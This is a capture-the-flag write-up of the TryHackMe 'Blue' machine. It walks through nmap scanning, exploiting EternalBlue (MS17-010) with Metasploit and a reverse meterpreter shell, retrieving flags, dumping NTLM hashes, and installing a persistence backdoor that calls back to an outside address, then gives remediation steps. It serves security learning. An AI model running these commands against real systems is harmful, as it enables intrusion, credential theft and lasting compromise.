Back to Writeups

Blue

TryHackMe Easy Windows
#eternalblue #ms17-010 #windows #metasploit #smb

Introduction

Blue is a beginner-friendly Windows machine from TryHackMe that demonstrates the famous EternalBlue exploit (MS17-010). This vulnerability was leaked by the Shadow Brokers and was used in the WannaCry ransomware attack.

Enumeration

Initial Scan

nmap -sV -sC -p- 10.10.x.x

Key Findings:

  • Port 135/tcp - Microsoft Windows RPC
  • Port 139/tcp - NetBIOS
  • Port 445/tcp - Microsoft-DS (SMB)
  • Port 3389/tcp - Remote Desktop Protocol (RDP)

SMB Vulnerability Scanning

Using nmap’s SMB vulnerability scripts:

nmap -p445 --script smb-vuln-ms17-010 10.10.x.x

Result confirms the machine is vulnerable to MS17-010 (EternalBlue).

Exploitation

Using Metasploit

Launch Metasploit and configure the exploit:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.x.x
set LHOST tun0
set payload windows/x64/meterpreter/reverse_tcp
exploit

After a few moments, we get a meterpreter session!

Gaining System Access

The exploit provides us with NT AUTHORITY\SYSTEM privileges immediately.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Flag Retrieval

Finding the Flags

Use meterpreter’s search functionality:

meterpreter > search -f flag*.txt

Navigate to each flag location and retrieve them:

# User flag
cat C:\Users\Jon\Desktop\flag1.txt

# Root flag
cat C:\Windows\System32\config\flag2.txt

Post-Exploitation

Dumping Credentials

Use meterpreter’s hashdump functionality:

meterpreter > hashdump

This provides NTLM hashes for all users on the system.

Persistence

For learning purposes, we can create a persistent backdoor:

meterpreter > run persistence -X -i 5 -p 4444 -r 10.10.14.5

Note: Only do this in authorized testing environments!

Key Takeaways

  1. Patch Management is Critical: MS17-010 was patched in March 2017, yet many systems remain vulnerable
  2. SMB Exposure: Exposing SMB to the internet is extremely dangerous
  3. Network Segmentation: Critical systems should be isolated from untrusted networks
  4. Monitoring: SMB traffic should be monitored for suspicious activity

Remediation

  • Apply Microsoft Security Bulletin MS17-010
  • Disable SMBv1 protocol
  • Implement network segmentation
  • Use host-based firewalls to restrict SMB access
  • Enable Windows Defender and keep it updated

Tools & Resources

Timeline

  • Initial Access: 5 minutes (exploit execution)
  • Privilege Escalation: N/A (exploit provides SYSTEM access)
  • Total Time: ~15 minutes